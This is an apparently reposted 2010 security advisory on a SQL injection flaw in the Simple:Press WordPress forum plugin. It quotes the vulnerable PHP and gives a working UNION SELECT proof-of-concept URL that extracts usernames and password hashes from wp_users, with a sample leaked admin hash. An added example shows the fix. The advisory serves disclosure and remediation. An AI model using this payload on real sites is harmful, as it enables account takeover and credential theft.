
Simple:Press Wordpress Plugin SQL Injection Vulnerability

Posted on 04 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Simple:Press Wordpress Plugin SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
=========================================================
Simple:Press Wordpress Plugin SQL Injection Vulnerability
=========================================================

# Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability
# Author: ADEO Security
# Published: 03/07/2010
# Version: v4.3.0 (possibly all versions)
# Vendor: http://simple-press.com
# Download: http://simple-press.com/download-manager.php?id=228
# Description: "Simple:Press – the feature rich, completely integrated and fully scaleable forum plugin for WordPress. Highly customisable, Simple:Press packs the features of a standalone forum into a plugin – seamlessly turning your WordPress site into a community."
# Credit: Vulnerability found by Canberk BOLAT at ADEO Security Labs - Mail: security[AT]adeo.com.tr - Web: http://security.adeo.com.tr

# Vulnerability:
In the search field, the search value is not filtered and is inserted into SQL queries without any quotes/single quotes, and Simple:Press executes these SQL queries.

sf-header-forum.php
---[snip]---
385 # Add Search Vars
386 if(isset($_GET['search']))
387 {
388     if($_GET['search'] != '') $sfvars['searchpage'] = sf_esc_int($_GET['search']);
389     if(isset($_GET['value']) ? $sfvars['searchvalue'] = stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] = '');
390     if(isset($_GET['type']) ? $sfvars['searchtype'] = sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);
400     if(isset($_GET['include']) ? $sfvars['searchinclude'] = sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);
401     if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;
402     if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;
403 } else {
---[snip]---

At line 389, the HTTP GET parameter "value" is assigned to the global variable $sfvars['searchvalue'] after passing through stripslashes() and urldecode(), but those functions cannot protect it: in sf-database.php the global variable $sfvars['searchvalue'] is inserted into the SQL query without any quotes/single quotes, so removing or escaping quote characters makes no difference and the value itself becomes part of the SQL text.

sf-database.php
---[snip]---
...
401 $searchvalue=urldecode($sfvars['searchvalue']);
...
404 if($sfvars['searchtype'] == 6)
...
409     $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";
410
411 } elseif($sfvars['searchtype'] == 8)
...
414     $userid = $sfvars['searchvalue'];
415     $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
416     $MATCH = "";
417     $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";
418
419 } elseif($sfvars['searchtype'] == 9)
...
422     $userid = $sfvars['searchvalue'];
...
425     $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";
...
---[snip]---

It is successfully exploitable with search types 6, 8 and 9. Please see the PoC section.

# PoC:
Request:
http://server/wordpress/?page_id=4/&amp;forum=all&amp;value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&amp;type=9&amp;search=1&amp;searchpage=2

Response:
Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo. (0 Matches Found)

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-04]</pre></body></html>
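As an added example (not the plugin's own code or its vendor patch), the same three branches rebuilt so the search value can never alter the query: `searchtype` is whitelisted, `searchvalue` must validate as a plain integer, and the SQL fragment is produced by WordPress's `$wpdb->prepare()` with a `%d` placeholder. The function name `sf_build_search_where()` is hypothetical; `$wpdb` and the plugin's `SFPOSTS`/`SFTOPICS` table-name constants are assumed to exist as in the plugin.

```php
<?php
// Added example, not Simple:Press code: build the search WHERE fragment
// for search types 6, 8 and 9 without splicing raw input into the SQL.
// Assumes the WordPress global $wpdb and the plugin's SFPOSTS / SFTOPICS
// table-name constants; the function name is hypothetical.

function sf_build_search_where(int $searchtype, $rawvalue): string
{
    global $wpdb;

    // Only these types take a numeric value (a status flag or a user id).
    // Every other type gets no extra restriction from this function.
    if (!in_array($searchtype, [6, 8, 9], true)) {
        return '';
    }

    // Reject anything that is not a plain decimal integer before it gets
    // near the query. The original code interpolated the value unquoted,
    // so stripslashes()/urldecode() could not help: a non-numeric value
    // simply became part of the SQL text itself.
    if (!is_string($rawvalue) && !is_int($rawvalue)) {
        return '';
    }
    if (filter_var($rawvalue, FILTER_VALIDATE_INT) === false) {
        return '';
    }
    $value = (int) $rawvalue;

    switch ($searchtype) {
        case 6:
            // %d is bound as an integer by $wpdb->prepare(); the value is
            // never concatenated into the query as raw text.
            return $wpdb->prepare(' AND topic_status_flag = %d ', $value);
        case 8:
            return $wpdb->prepare(' AND ' . SFPOSTS . '.user_id = %d ', $value);
        case 9:
            return $wpdb->prepare(' AND ' . SFTOPICS . '.user_id = %d ', $value);
    }
    return '';
}

// Usage at the point where sf-database.php builds $ANDWHERE:
// $ANDWHERE = sf_build_search_where((int) $sfvars['searchtype'], $sfvars['searchvalue']);
```

Coercing the value to an integer, as the plugin already does for the `type` and `search` parameters via `sf_esc_int()`, is what closes the hole in an unquoted numeric context; quote-escaping functions have nothing to act on there.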

